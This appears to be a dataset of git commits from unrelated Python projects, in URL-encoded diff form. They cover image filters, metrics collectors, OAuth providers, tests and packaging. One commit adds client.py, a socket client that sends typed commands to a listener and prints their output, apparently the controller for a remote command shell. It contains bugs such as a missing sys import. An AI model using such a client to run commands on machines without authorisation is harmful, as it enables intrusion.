+# -*- coding: utf-8 -*-%0A%0Aimport hashlib%0Aimport socket%0Aimport struct%0A%0ASERVER_NAME = 'localhost'%0ASERVER_PORT = 9876%0A%0Adef main():%0A client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)%0A client_socket.connect((SERVER_NAME, SERVER_PORT))%0A%0A msg_len = 1600%0A payload = 'a' * msg_len%0A msg = struct.pack('!Q', msg_len) + payload.encode('utf-8')%0A%0A client_socket.sendall(msg)%0A print('data sent')%0A%0A pin = client_socket.recv(256)%0A print(len(pin))%0A print('received hash: %5Ct' + pin.decode('utf-8'))%0A%0A md5 = hashlib.md5()%0A md5.update(payload.encode('utf-8'))%0A print('local hash: %5Ct' + md5.hexdigest())%0A%0Aif __name__ == '__main__':%0A main()%0A
|
|
6d93e603cd45544e296b8cd90853377688af6376
|
Add median/LoG filter fcn
|
imgphon/ultrasound.py
|
imgphon/ultrasound.py
|
Python
| 0.000001
|
@@ -0,0 +1,778 @@
+import numpy as np%0Afrom scipy.ndimage import median_filter%0Afrom scipy.ndimage.filters import gaussian_laplace%0A%0Adef clean_frame(frame, median_radius=5, log_sigma=4):%0A %22%22%22%0A Input: ndarray image, filter kernel settings%0A Output: cleaned ndarray image%0A A median filter is used to remove speckle noise, %0A followed by edge sharpening with a Laplacian %0A of Gaussian (LoG) mask.%0A %22%22%22%0A%0A # TODO scale input image in range (0,1)%0A # TODO provide default for median_radius that is %0A # sensitive to image dimensions%0A%0A frame = frame.astype(np.int64)%0A medfilt = median_filter(frame, median_radius)%0A logmask = gaussian_laplace(medfilt, log_sigma)%0A cleaned = medfilt + logmask%0A cleaned = cleaned.astype(np.uint8)%0A %0A return cleaned
|
|
ca3add180e8dc124e9ebec35682215a6de0ae9b1
|
Add test_poly_divide script.
|
research/test_poly_divide.py
|
research/test_poly_divide.py
|
Python
| 0
|
@@ -0,0 +1,913 @@
+%0A# use time() instead on unix%0Aimport sys%0Aif sys.platform=='win32':%0A from time import clock%0Aelse:%0A from time import time as clock%0A%0Afrom sympycore import profile_expr%0A%0Adef time1(n=500):%0A import sympycore as sympy%0A w = sympy.Fraction(3,4)%0A x = sympy.polynomials.poly(%5B0, 1, 1%5D)%0A a = (x-1)*(x-2)*(x-3)*(x-4)*(x-5)%0A b = (x-1)*(x-2)*(x-w)%0A t1 = clock()%0A while n:%0A divmod(a, b)%0A n -= 1%0A t2 = clock()%0A return 100 / (t2-t1)%0A%0Adef time2(n=500):%0A import sympycore as sympy%0A w = sympy.Fraction(3,4)%0A x = sympy.polynomials.PolynomialRing%5B1%5D(%5B0, 1, 1%5D)%0A a = (x-1)*(x-2)*(x-3)*(x-4)*(x-5)%0A b = (x-1)*(x-2)*(x-w)%0A t1 = clock()%0A while n:%0A divmod(a, b)%0A n -= 1%0A t2 = clock()%0A return 100 / (t2-t1)%0A%0Adef timing():%0A t1 = time1()%0A t2 = time2()%0A return t1, t2, t1/t2%0A%0Aprint timing()%0Aprint timing()%0Aprint timing()%0A%0Aprofile_expr('time2(50)')%0A
|
|
8adbbc365042d49c1304610b3425e0974b1c6451
|
Switch a little of the html generation to jinja2
|
blaze/server/datashape_html.py
|
blaze/server/datashape_html.py
|
from ..datashape import DataShape, Record, Fixed, Var, CType, String, JSON
#from blaze_server_config import jinja_env
#from jinja2 import Template
def json_comment(array_url):
return '<font style="font-size:x-small"> # <a href="' + \
array_url + '?r=data.json">JSON</a></font>\n'
def render_datashape_recursive(base_url, ds, indent):
result = ''
if isinstance(ds, DataShape):
for dim in ds[:-1]:
if isinstance(dim, Fixed):
result += ('%d, ' % dim)
elif isinstance(dim, Var):
result += 'var, '
else:
raise TypeError('Cannot render datashape with dimension %r' % dim)
result += render_datashape_recursive(base_url, ds[-1], indent)
elif isinstance(ds, Record):
result += '{' + json_comment(base_url)
for fname, ftype in zip(ds.names, ds.types):
child_url = base_url + '.' + fname
child_result = render_datashape_recursive(child_url,
ftype, indent + ' ')
result += (indent + ' ' +
'<a href="' + child_url + '">' + str(fname) + '</a>'
': ' + child_result + ';')
if isinstance(ftype, Record):
result += '\n'
else:
result += json_comment(child_url)
result += (indent + '}')
elif isinstance(ds, (CType, String, JSON)):
result += str(ds)
else:
raise TypeError('Cannot render datashape %r' % ds)
return result
def render_datashape(base_url, ds):
print('base url is %s' % base_url)
result = render_datashape_recursive(base_url, ds, '')
result = '<pre>\ntype <a href="' + base_url + \
'?r=datashape">BlazeDataShape</a> = ' + result + '\n</pre>'
return result
|
Python
| 0.000001
|
@@ -111,17 +111,16 @@
nja_env%0A
-#
from jin
@@ -140,20 +140,16 @@
mplate%0A%0A
-def
json_com
@@ -156,33 +156,29 @@
ment
-(array_url):%0A return '
+_templ = Template(%22%22%22
%3Cfon
@@ -221,35 +221,20 @@
ef=%22
-' + %5C%0A array_url + '
+%7B%7Bbase_url%7D%7D
?r=d
@@ -258,19 +258,151 @@
%3E%3C/font%3E
-%5Cn'
+%0A%0A%22%22%22)%0A%0Adatashape_outer_templ = Template(%22%22%22%0A%3Cpre%3E%0Atype %3Ca href=%22%7B%7Bbase_url%7D%7D?r=datashape%22%3EBlazeDataShape%3C/a%3E = %7B%7Bds_html%7D%7D%0A%3C/pre%3E%0A%22%22%22)
%0A%0Adef re
@@ -922,17 +922,39 @@
_comment
-(
+_templ.render(base_url=
base_url
@@ -1450,17 +1450,39 @@
_comment
-(
+_templ.render(base_url=
child_ur
@@ -1723,53 +1723,15 @@
-print('base url is %25s' %25 base_url)%0A result
+ds_html
= r
@@ -1784,140 +1784,74 @@
re
-sult = '%3Cpre%3E%5Cntype %3Ca href=%22' + base_url + %5C%0A '?r=datashape%22%3EBlazeDataShape%3C/a%3E = ' + result + '%5Cn%3C/pre%3E'%0A return result
+turn datashape_outer_templ.render(base_url=base_url, ds_html=ds_html)
%0A
|
ce1921e079b68c250b6bc979e67c478b94747688
|
Change the order of metric name components
|
src/collectors/postgres/postgres.py
|
src/collectors/postgres/postgres.py
|
# coding=utf-8
"""
Collect metrics from postgresql
#### Dependencies
* psycopg2
"""
import diamond.collector
try:
import psycopg2
psycopg2 # workaround for pyflakes issue #13
except ImportError:
psycopg2 = None
class PostgresqlCollector(diamond.collector.Collector):
def get_default_config_help(self):
config_help = super(PostgresqlCollector, self).get_default_config_help()
config_help.update({
'host': 'Hostname',
'user': 'Username',
'password': 'Password',
'port': 'Port number',
'underscore': 'Convert _ to .'
})
return config_help
def get_default_config(self):
"""
Return default config.
"""
config = super(PostgresqlCollector, self).get_default_config()
config.update({
'path': 'postgres',
'host': 'localhost',
'user': 'postgres',
'password': 'postgres',
'port': 5432,
'underscore': False,
'method': 'Threaded'})
return config
def collect(self):
if psycopg2 is None:
self.log.error('Unable to import module psycopg2')
return {}
self.conn_string = "host=%s user=%s password=%s port=%s" % (
self.config['host'],
self.config['user'],
self.config['password'],
self.config['port'])
self.conn = psycopg2.connect(self.conn_string)
self.cursor = self.conn.cursor()
# Statistics
self.cursor.execute("SELECT pg_stat_database.*, \
pg_database_size(pg_database.datname) AS size \
FROM pg_database JOIN pg_stat_database \
ON pg_database.datname = pg_stat_database.datname \
WHERE pg_stat_database.datname \
NOT IN ('template0','template1','postgres')")
stats = self.cursor.fetchall()
# Connections
self.cursor.execute("SELECT datname, count(datname) \
FROM pg_stat_activity GROUP BY pg_stat_activity.datname;")
connections = self.cursor.fetchall()
ret = {}
for stat in stats:
info = {'numbackends': stat[2],
'xact_commit': stat[3],
'xact_rollback': stat[4],
'blks_read': stat[5],
'blks_hit': stat[6],
'tup_returned': stat[7],
'tup_fetched': stat[8],
'tup_inserted': stat[9],
'tup_updated': stat[10],
'tup_deleted': stat[11],
'conflicts': stat[12],
'size': stat[14]}
database = stat[1]
ret[database] = info
for database in ret:
if self.config['underscore']:
database = database.replace("_", ".")
for (metric, value) in ret[database].items():
self.publish("%s.database.%s" % (
database, metric), value)
for (database, connection) in connections:
self.publish("%s.database.connections" % (
database), connection)
self.cursor.close()
self.conn.close()
|
Python
| 0.99894
|
@@ -2990,35 +2990,32 @@
self.publish(%22
-%25s.
database.%25s%22 %25 (
@@ -3009,16 +3009,19 @@
abase.%25s
+.%25s
%22 %25 (%0A
@@ -3146,19 +3146,16 @@
ublish(%22
-%25s.
database
@@ -3155,16 +3155,19 @@
atabase.
+%25s.
connecti
|
711de8a04598fb531b5f70f334633b713dfa76c7
|
Create TypeIt.py
|
TypeIt.py
|
TypeIt.py
|
Python
| 0.000001
|
@@ -0,0 +1,22 @@
+print(%22Hello Daniel%22)%0A
|
|
94151b40c3b862c5ddf57c11228f6c99a8c38a7e
|
Define manage.py to launch app and app-related tasks
|
edx_data_research/web_app/manage.py
|
edx_data_research/web_app/manage.py
|
Python
| 0.000001
|
@@ -0,0 +1,526 @@
+#!/usr/bin/python%0Afrom flask.ext.script import Manager, Server, Shell%0A%0Afrom edx_data_research.web_app import app%0Afrom edx_data_research.web_app.models import User, Role%0A%0Amanager = Manager(app)%0A%0Amanager.add_command('run-server', Server(use_debugger=True, use_reloader=True,%0A host='0.0.0.0'))%0Adef make_shell_context():%0A return dict(app=app, db=db, User=User, Role=Role)%0Amanager.add_command('shell', Shell(make_context=make_shell_context))%0A%0Aif __name__ == '__main__':%0A manager.run()%0A
|
|
ec919af7fba21e98e73e6c435dda4f10e90b82ba
|
Create Vector.py
|
Vector.py
|
Vector.py
|
Python
| 0
|
@@ -0,0 +1,2795 @@
+# The Vector class%0Aclass Vector:%0A%0A # Initialiser%0A def __init__(self, p=(0,0)):%0A self.x = p%5B0%5D%0A self.y = p%5B1%5D%0A%0A # Returns a string representation of the vector%0A def __str__(self):%0A return %22(%22+ str(self.x) + %22,%22 + str(self.y) + %22)%22%0A%0A # Tests the equality of this vector and another%0A def __eq__(self, other):%0A return self.x == other.x and self.y == other.y%0A%0A # Tests the inequality of this vector and another%0A def __ne__(self, other):%0A return not self.__eq__(other)%0A%0A # Returns a tuple with the point corresponding to the vector%0A def getP(self):%0A return (self.x, self.y)%0A%0A # Returns a copy of the vector%0A def copy(self):%0A v = Vector()%0A v.x = self.x%0A v.y = self.y%0A return v%0A%0A # Multiplies the vector by a scalar%0A def mult(self, k):%0A self.x *= k%0A self.y *= k%0A return self%0A%0A # Divides the vector by a scalar%0A def div(self, k):%0A self.x /= k%0A self.y /= k%0A return self%0A%0A # Normalizes the vector%0A def normalise(self):%0A v = math.sqrt(self.x**2 + self.y**2)%0A self.x /= v%0A self.y /= v%0A%0A # Returns a normalized version of the vector%0A def getNormalised(self):%0A return (self.x/math.sqrt(math.pow(self.x, 2)+math.pow(self.y, 2)), self.y/math.sqrt(math.pow(self.x, 2)+math.pow(self.y, 2)))%0A%0A def getNormal(self):%0A return Vector(self.getNormalised())%0A%0A%0A # Adds another vector to this vector%0A def add(self, other):%0A self.x += other.x%0A self.y += other.y%0A return self%0A%0A # Subtracts another vector from this vector%0A def sub(self, other):%0A self.x -= other.x%0A self.y -= other.y%0A return self%0A%0A # Returns the zero vector%0A def zero(self):%0A self.x = 0%0A self.y = 0%0A return self%0A%0A # Negates the vector (makes it point in the opposite direction)%0A def negate(self):%0A self.x = -self.x%0A self.y = -self.y%0A return self%0A%0A # Returns the dot product of this vector with another one%0A def dot(self, other):%0A return self.x*other.x + self.y*other.y%0A%0A # Returns the length of the vector%0A def length(self):%0A return math.sqrt(self.lengthSquared())%0A%0A # Returns the squared length of the vector%0A def lengthSquared(self):%0A return self.x**2 + self.y**2%0A%0A # Reflect this vector on a normal%0A def reflect(self, normal):%0A n = normal.copy()%0A n.mult(2*self.dot(normal))%0A self.sub(n)%0A return self%0A%0A # Returns the angle between this vector and another one%0A def angle(self, other):%0A a = math.sqrt(self.x**2 + self.y**2)%0A b = math.sqrt(math.pow(other.x, 2) + math.pow(other.y, 2))%0A return math.acos((self.x*other.x+self.y*other.y)/(a*b))%0A
|
|
a70abcdd95612fe3df4fc3dd9c4ae8151add5a28
|
add an example file
|
example.py
|
example.py
|
Python
| 0.000001
|
@@ -0,0 +1,1713 @@
+import numpy as np%0Afrom pyscatter3d import pyscatter3d%0A%0AX0,Y0 = np.meshgrid(np.linspace(-3,3,50), np.linspace(-3,3,50))%0AD = np.sqrt(X0**2+Y0**2) # radial distance%0AZ0 = np.sinc(D)%0A%0A_ = np.random.randn(3, 1e3)%0AX1,Y1,Z1 = _/np.linalg.norm(_, axis=0)%0A%0Anp.savetxt('sinc.csv', np.array(%5Barr.flatten() for arr in %5BX0,Y0,Z0,1/D%5D%5D).T,%0A delimiter=',', header='X,Y,Z,inv_dist', comments='')%0A%0Anp.savetxt('sphere.csv', np.array(%5Barr.flatten() for arr in %5BX1,Y1,Z1%5D%5D).T,%0A delimiter=',', header='X,Y,Z', comments='')%0A%0Acsv_dir = '/home/vsokolov/Projects/g35.39/tables/'%0A# dataset names and their corresponding filenames%0Adatasets = %7B'sinc' : 'sinc.csv',%0A 'sphere': 'sphere.csv'%7D%0A%0A# what column names to use as X/Y/Z values%0Awhich_x, which_y, which_z = 'X', 'Y', 'Z'%0A# which_s controls the marker size%0Awhich_s = 'inv_dist'%0A%0A# output file name (without an extension)%0Aoutfile = 'example'%0A%0Adefault_size = %7B'matplotlib': 30, %0A 'plotly' : 10 %7D%0A%0Aline2text = %7B'sinc': 'sinc(x)', 'sphere': 'sphere' %7D%0Aline2color = %7B'sinc': '#e41a1c', 'sphere': '#377eb8'%7D%0A%0A# NOTE: the 'star' symbol doesn't work with plotly scatter3d :C%0A# see here: https://github.com/plotly/plotly.py/issues/454%0A# supported marker symbols in plotly scatter-3d:%0A# (enumerated: %22circle%22 %7C %22circle-open%22 %7C %22square%22 %7C %22square-open%22 %7C %0A# %22diamond%22 %7C %22diamond-open%22 %7C %22cross%22 %7C %22x%22 )%0Aline2symbol = %7B'matplotlib': %7B'sphere': 'd', 'sinc': 'o' %7D,%0A 'plotly' : %7B'sphere': 'diamond', 'sinc': 'circle'%7D %7D%0A%0Apyscatter3d(datasets, line2text, line2color, line2symbol,%0A which_x, which_y, which_z, which_s, default_size,%0A outfile=outfile, backend='both')%0A
|
|
28e6c21e2a8bc78a6f4292eef2daec4b70d0b887
|
Add support for Pocket
|
services/pocket.py
|
services/pocket.py
|
Python
| 0
|
@@ -0,0 +1,1725 @@
+from werkzeug.urls import url_decode%0Aimport requests%0Aimport foauth.providers%0A%0A%0Aclass Pocket(foauth.providers.OAuth2):%0A # General info about the provider%0A provider_url = 'http://getpocket.com/'%0A docs_url = 'http://getpocket.com/developer/docs/overview'%0A category = 'News'%0A%0A # URLs to interact with the API%0A request_token_url = 'https://getpocket.com/v3/oauth/request'%0A authorize_url = 'https://getpocket.com/auth/authorize'%0A access_token_url = 'https://getpocket.com/v3/oauth/authorize'%0A api_domain = 'getpocket.com'%0A%0A available_permissions = %5B%0A (None, 'access your saved articles'),%0A %5D%0A supports_state = False%0A%0A def get_authorize_params(self, redirect_uri, scopes):%0A params = super(Pocket, self).get_authorize_params(redirect_uri, scopes)%0A r = requests.post(self.request_token_url, data=%7B%0A 'consumer_key': params%5B'client_id'%5D,%0A 'redirect_uri': redirect_uri,%0A %7D)%0A data = url_decode(r.content)%0A redirect_uri = '%25s&code=%25s' %25 (params%5B'redirect_uri'%5D, data%5B'code'%5D)%0A return %7B%0A 'request_token': data%5B'code'%5D,%0A 'redirect_uri': redirect_uri,%0A %7D%0A%0A def get_access_token_response(self, redirect_uri, data):%0A return requests.post(self.get_access_token_url(), %7B%0A 'consumer_key': self.client_id,%0A 'code': data%5B'code'%5D,%0A 'redirect_uri': redirect_uri%0A %7D)%0A%0A def parse_token(self, content):%0A data = url_decode(content)%0A data%5B'service_user_id'%5D = data%5B'username'%5D%0A return data%0A%0A def bearer_type(self, token, r):%0A r.prepare_url(r.url, %7B'consumer_key': self.client_id, 'access_token': token%7D)%0A return r%0A
|
|
e42b22dc0a71fb5c7572ca69c63ab6a7b0ba8479
|
add error handling for celery tasks
|
src/helfertool/tasks.py
|
src/helfertool/tasks.py
|
Python
| 0.000001
|
@@ -0,0 +1,626 @@
+from __future__ import absolute_import%0A%0Afrom celery.signals import task_failure%0A%0Afrom django.conf import settings%0Afrom django.core.mail import mail_admins%0Afrom django.views.debug import ExceptionReporter%0A%0A%0A@task_failure.connect%0Adef celery_error_handler(task_id, exception, traceback, einfo, *args, **kwargs):%0A if settings.DEBUG:%0A return%0A%0A mail_subject = %22Task exception - %7B%7D%22.format(exception)%0A mail_subject = mail_subject.replace(%22%5Cn%22, %22 %22)%5B:250%5D%0A%0A reporter = ExceptionReporter(None, einfo.type, exception, traceback)%0A mail_text = reporter.get_traceback_text()%0A%0A mail_admins(mail_subject, mail_text)%0A
|
|
73f75483156056b61f3b6bec4fe2f09522c2c34a
|
Add tests for mixin order
|
test/integration/ggrc/models/test_eager_query.py
|
test/integration/ggrc/models/test_eager_query.py
|
Python
| 0
|
@@ -0,0 +1,1394 @@
+# Copyright (C) 2016 Google Inc., authors, and contributors %3Csee AUTHORS file%3E%0A# Licensed under http://www.apache.org/licenses/LICENSE-2.0 %3Csee LICENSE file%3E%0A# Created By: miha@reciprocitylabs.com%0A# Maintained By: miha@reciprocitylabs.com%0A%0A%22%22%22Tests for making sure eager queries are working on all mixins.%22%22%22%0A%0Afrom ggrc.models import all_models%0Afrom ggrc.models import mixins%0Afrom integration.ggrc import TestCase%0A%0A%0Aclass TestAllModels(TestCase):%0A %22%22%22Test basic model structure for all models%22%22%22%0A%0A def test_all_model_mro(self):%0A %22%22%22Test the correct mixin order for eager queries.%0A%0A This test checks that all models that have an eager query, have the last%0A mixin in the mro Identifiable. If there are any other mixins with eager%0A query after it, the eager query on those is ignored and that is an error.%0A %22%22%22%0A errors = set()%0A for model in all_models.all_models:%0A eager = %5Bmixin for mixin in model.mro()%0A if hasattr(mixin, %22eager_query%22)%5D%0A if eager:%0A try:%0A self.assertEqual(%0A eager%5B-1%5D, mixins.Identifiable,%0A %22Model %7B%7D, has wrong mixin order. The last mixin with %22%0A %22eager_query is '%7B%7D' instead of 'Identifiable'.%22.format(%0A model.__name__, eager%5B-1%5D.__name__),%0A )%0A except AssertionError as error:%0A errors.add(error)%0A self.assertEqual(set(), errors)%0A
|
|
6ed99163b10209566a0575a9a67d1ab2ad552fd9
|
Add test for committee subscriptions page
|
tests/views/test_committee_subscriptions_page.py
|
tests/views/test_committee_subscriptions_page.py
|
Python
| 0
|
@@ -0,0 +1,666 @@
+import datetime%0Afrom tests import PMGLiveServerTestCase%0Afrom tests.fixtures import dbfixture, HouseData, CommitteeData%0A%0ATHIS_YEAR = datetime.datetime.today().year%0A%0A%0Aclass TestCommitteeSubscriptionsPage(PMGLiveServerTestCase):%0A def test_committee_subscriptions_page(self):%0A %22%22%22%0A Test committee subscriptions page (/committee-subscriptions)%0A %22%22%22%0A self.make_request(%22/committee-subscriptions%22, follow_redirects=True)%0A self.assertIn(%0A %22Access to meeting reports for premium committees from before %7B%7D is freely accessible to everyone.%22.format(%0A THIS_YEAR - 1%0A ),%0A self.html,%0A )%0A
|
|
5e9b6bc60f0f81db3ed451eb89c23b77888e1167
|
Update a comment
|
djangae/db/backends/appengine/expressions.py
|
djangae/db/backends/appengine/expressions.py
|
from django.db.models.expressions import F
from djangae.db.utils import get_prepared_db_value
CONNECTORS = {
F.ADD: lambda l, r: l + r,
F.SUB: lambda l, r: l - r,
F.MUL: lambda l, r: l * r,
F.DIV: lambda l, r: l / r,
}
def evaluate_expression(expression, instance, connection):
""" A limited evaluator for Django's F expressions. Although they're evaluated
before the database call, so they don't provide the race condition protection,
but neither does our update() implementation so we provide this for convenience.
"""
if isinstance(expression, (basestring, int, float)):
return expression
if hasattr(expression, 'name'):
field = instance._meta.get_field(expression.name)
return get_prepared_db_value(connection, instance._original, field)
if hasattr(expression, 'value'):
return expression.value
if hasattr(expression, 'connector') and expression.connector in CONNECTORS:
if hasattr(expression, 'children'):
lhs, rhs = expression.children
else:
lhs, rhs = expression.lhs, expression.rhs
return CONNECTORS[expression.connector](
evaluate_expression(lhs, instance, connection),
evaluate_expression(rhs, instance, connection),
)
raise NotImplementedError("Support for expression %r isn't implemented", expression)
|
Python
| 0
|
@@ -351,22 +351,14 @@
ns.
-Although they'
+This a
re e
@@ -365,16 +365,23 @@
valuated
+ within
%0A
@@ -385,175 +385,81 @@
-before the database call, so they don't provide the race condition protection,%0A but neither does our update() implementation so we provide this for convenience.
+the get/put transaction in _update_entity so these will happen atomically
%0A
@@ -463,16 +463,17 @@
%22%22%22%0A
+%0A
if i
|
e53f0f4b0f541adf6b8a9df3c2a2af2c8b306720
|
Fix lint.
|
packs/email/sensors/imap_sensor.py
|
packs/email/sensors/imap_sensor.py
|
import hashlib
import base64
import eventlet
import easyimap
from flanker import mime
from st2reactor.sensor.base import PollingSensor
__all__ = [
'IMAPSensor'
]
eventlet.monkey_patch(
os=True,
select=True,
socket=True,
thread=True,
time=True)
DEFAULT_DOWNLOAD_ATTACHMENTS = False
DEFAULT_MAX_ATTACHMENT_SIZE = 1024
DEFAULT_ATTACHMENT_DATASTORE_TTL = 1800
class IMAPSensor(PollingSensor):
def __init__(self, sensor_service, config=None, poll_interval=30):
super(IMAPSensor, self).__init__(sensor_service=sensor_service,
config=config,
poll_interval=poll_interval)
self._trigger = 'email.imap.message'
self._logger = self._sensor_service.get_logger(__name__)
self._max_attachment_size = self._config.get('max_attachment_size',
DEFAULT_MAX_ATTACHMENT_SIZE)
self._attachment_datastore_ttl = self._config.get('attachment_datastore_ttl',
DEFAULT_MAX_ATTACHMENT_SIZE)
self._mailboxes = {}
def setup(self):
self._logger.debug('[IMAPSensor]: entering setup')
if 'imap_mailboxes' in self._config:
self._parse_mailboxes(self._config['imap_mailboxes'])
def poll(self):
self._logger.debug('[IMAPSensor]: entering poll')
for name, values in self._mailboxes.items():
mailbox = values['connection']
download_attachments = values['download_attachments']
self._poll_for_unread_messages(name=name, mailbox=mailbox,
download_attachments=download_attachments)
def cleanup(self):
self._logger.debug('[IMAPSensor]: entering cleanup')
for name, values in self._mailboxes.items():
mailbox = values['connection']
self._logger.debug('[IMAPSensor]: Disconnecting from {0}'.format(name))
mailbox.quit()
def add_trigger(self, trigger):
pass
def update_trigger(self, trigger):
pass
def remove_trigger(self, trigger):
pass
def _parse_mailboxes(self, mailboxes):
for mailbox, config in mailboxes.items():
server = config.get('server', 'localhost')
port = config.get('port', 143)
user = config.get('username', None)
password = config.get('password', None)
folder = config.get('mailbox', 'INBOX')
ssl = config.get('ssl', False)
download_attachments = config.get('download_attachments', DEFAULT_DOWNLOAD_ATTACHMENTS)
if not user or not password:
self._logger.debug("""[IMAPSensor]: Missing
username/password for {0}""".format(mailbox))
continue
if not server:
self._logger.debug("""[IMAPSensor]: Missing server
for {0}""".format(mailbox))
continue
try:
connection = easyimap.connect(server, user, password,
folder, ssl=ssl, port=port)
except Exception as e:
message = 'Failed to connect to mailbox "%s": %s' % (mailbox, str(e))
raise Exception(message)
item = {
'connection': connection,
'download_attachments': download_attachments
}
self._mailboxes[mailbox] = item
def _poll_for_unread_messages(self, name, mailbox, download_attachments=False):
self._logger.debug('[IMAPSensor]: polling mailbox {0}'.format(name))
for message in mailbox.unread():
self._process_message(uid=message.uid, mailbox=mailbox,
download_attachments=download_attachments)
return
def _process_message(self, uid, mailbox, download_attachments=DEFAULT_DOWNLOAD_ATTACHMENTS):
message = mailbox.mail(uid, include_raw=True)
mime_msg = mime.from_string(message.raw)
body = message.body
sent_from = message.from_addr
sent_to = message.to
subject = message.title
date = message.date
message_id = message.message_id
headers = mime_msg.headers.items()
has_attachments = bool(message.attachments)
payload = {
'uid': uid,
'from': sent_from,
'to': sent_to,
'headers': headers,
'date': date,
'subject': subject,
'message_id': message_id,
'body': body,
'has_attachments': has_attachments,
'attachments': []
}
if has_attachments and download_attachments:
self._logger.debug('[IMAPSensor]: Downloading attachments for message {}'.format(uid))
result = self._download_and_store_message_attachments(message=message)
payload['attachments'] = result
self._sensor_service.dispatch(trigger=self._trigger, payload=payload)
def _download_and_store_message_attachments(self, message):
"""
Method which downloads the provided message attachments and stores them in a datasatore.
:rtype: ``list`` of ``dict``
"""
attachments = message.attachments
result = []
for (file_name, content, content_type) in attachments:
attachment_size = len(content)
if len(content) > self._max_attachment_size:
self._logger.debug(('[IMAPSensor]: Skipping attachment "{}" since its bigger '
'than maximum allowed size ({})'.format(file_name, attachment_size)))
continue
datastore_key = self._get_attachment_datastore_key(message=message,
file_name=file_name)
# Store attachment in the datastore
if content_type == 'text/plain':
value = content
else:
value = base64.b64encode(content)
self._sensor_service.set_value(name=datastore_key, value=value,
ttl=self._attachment_datastore_ttl,
local=False)
item = {
'file_name': file_name,
'content_type': content_type,
'datastore_key': datastore_key
}
result.append(item)
return result
def _get_attachment_datastore_key(self, message, file_name):
key = '%s-%s' % (message.uid, file_name)
key = 'attachments-%s' % (hashlib.md5(key).hexdigest())
return key
|
Python
| 0.000001
|
@@ -915,33 +915,32 @@
-
DEFAULT_MAX_ATTA
@@ -5746,16 +5746,92 @@
le_name,
+%0A
attachm
|
37e59cbd7e8b4901644adcb73a7f491247fdea69
|
Add py-pyperclip package (#12375)
|
var/spack/repos/builtin/packages/py-pyperclip/package.py
|
var/spack/repos/builtin/packages/py-pyperclip/package.py
|
Python
| 0
|
@@ -0,0 +1,595 @@
+# Copyright 2013-2019 Lawrence Livermore National Security, LLC and other%0A# Spack Project Developers. See the top-level COPYRIGHT file for details.%0A#%0A# SPDX-License-Identifier: (Apache-2.0 OR MIT)%0A%0Afrom spack import *%0A%0A%0Aclass PyPyperclip(PythonPackage):%0A %22%22%22A cross-platform clipboard module for Python.%22%22%22%0A%0A homepage = %22https://github.com/asweigart/pyperclip%22%0A url = %22https://pypi.io/packages/source/p/pyperclip/pyperclip-1.7.0.tar.gz%22%0A%0A version('1.7.0', sha256='979325468ccf682104d5dcaf753f869868100631301d3e72f47babdea5700d1c')%0A%0A depends_on('py-setuptools', type='build')%0A
|
|
6427c55bbd51abaef6847e4f2af239d5977d0048
|
Create client.py
|
client.py
|
client.py
|
Python
| 0
|
@@ -0,0 +1,555 @@
+import socket%0A%0Atarget_host = %220.0.0.0%22%0Atarget_port = 9999%0A%0Aif(len(sys.argv) %3E 1):%0A try:%0A target_ip = sys.argv%5B1%5D%0A target_port = int(sys.argv%5B2%5D)%0A except Exception:%0A pass #lazy%0A%0A%0Aclient = socket.socket(socket.AF_INET, socket.SOCK_STREAM)%0A%0Aclient.connect((target_host, target_port))%0A'''%0Aclient.send(%22ls%22)%0A%0Aresponse = client.recv(4096)%0A%0Aprint %22Output: %22 + response.rstrip(%22%5Cn%22)%0A'''%0Awhile True:%0A%09lmao = raw_input(%22Enter Command:%5Cn%22)%0A%09client.send(lmao)%0A%09response = client.recv(4096)%0A%09print %22Output: %22 + response.rstrip(%22%5Cn%22)%0A
|
|
04d6765c14de3d6d5eb36d9ad268012f9e7625bc
|
add test for search items #30
|
vagrant/tradyfit/tests/functional/test_search.py
|
vagrant/tradyfit/tests/functional/test_search.py
|
Python
| 0
|
@@ -0,0 +1,2680 @@
+# -*- coding: utf-8 -*-%0Aimport re%0Afrom bs4 import BeautifulSoup%0Afrom helper import SeleniumTestCase%0Aimport page%0A%0A%0Aclass SearchTestCase(SeleniumTestCase):%0A%0A @classmethod%0A def setUpClass(cls):%0A # connect to webdriver, create app, launch server in thread%0A super(SearchTestCase, cls).setUpClass()%0A%0A @classmethod%0A def tearDownClass(cls):%0A # stop the server, destroy db and remove app context%0A super(SearchTestCase, cls).tearDownClass()%0A%0A%0A def setUp(self):%0A if not self.client:%0A self.skipTest('Web browser not available')%0A%0A def tearDown(self):%0A pass%0A%0A%0A def test_search_no_login(self):%0A '''Verify a not logged in user see items on a search ordered%0A by time creation%0A 1. Go to home page%0A 2. Make a search with the word 't-shirt'%0A 3. Verify you are redirected to the search results page%0A 4. Verify items are displayed by time creation (last first)%0A '''%0A self.client.get('http://localhost:5000')%0A%0A # home page object%0A home_page = page.HomePage(self.client)%0A self.assertTrue(home_page.is_title_matches)%0A%0A # make a search%0A home_page.make_search('t-shirt')%0A%0A # assert the items appears in the page ordered by desc time creation%0A soup = BeautifulSoup(self.client.page_source)%0A items = soup.find_all(%22div%22, id=re.compile(%22%5Eitem-%22))%0A self.assertTrue(len(items) == 2)%0A self.assertTrue('Lakers t-shirt' in str(items%5B0%5D))%0A%0A%0A def test_search_login(self):%0A '''Verify a logged in user see items on a search ordered%0A by nearby location%0A 1. Go to home page%0A 2. Click on Login link%0A 3. Fill login form and submit%0A 4. Make a search with the word 'bike'%0A 5. Verify you are redirected to the search results page%0A 6. Verify items are displayed by time creation (last first)%0A '''%0A self.client.get('http://localhost:5000')%0A%0A # home page object%0A home_page = page.HomePage(self.client)%0A self.assertTrue(home_page.is_title_matches)%0A%0A # navigate to login page%0A home_page.go_to_login()%0A%0A login_page = page.LoginPage(self.client)%0A self.assertTrue(login_page.is_title_matches)%0A%0A # login user US%0A login_page.login(self.app.config%5B'FB_TEST_EMAIL'%5D,%0A self.app.config%5B'FB_TEST_PWD'%5D)%0A%0A # make a search%0A home_page.make_search('t-shirt')%0A%0A search_page = page.SearchPage(self.client)%0A self.assertTrue(search_page.is_title_matches)%0A%0A # assert the items appears in the page ordered by user nearby%0A soup = BeautifulSoup(self.client.page_source)%0A items = soup.find_all(%22div%22, id=re.compile(%22%5Eitem-%22))%0A self.assertTrue(len(items) == 2)%0A self.assertTrue('Soccer t-shirt' in str(items%5B0%5D))%0A%0A #log out user%0A search_page.go_to_log_out()%0A%0A
|
|
ad3744acef6d855fcc074c7412c3e224d5a8f205
|
add missing file
|
saga/utils/pty_exceptions.py
|
saga/utils/pty_exceptions.py
|
Python
| 0.000003
|
@@ -0,0 +1,1687 @@
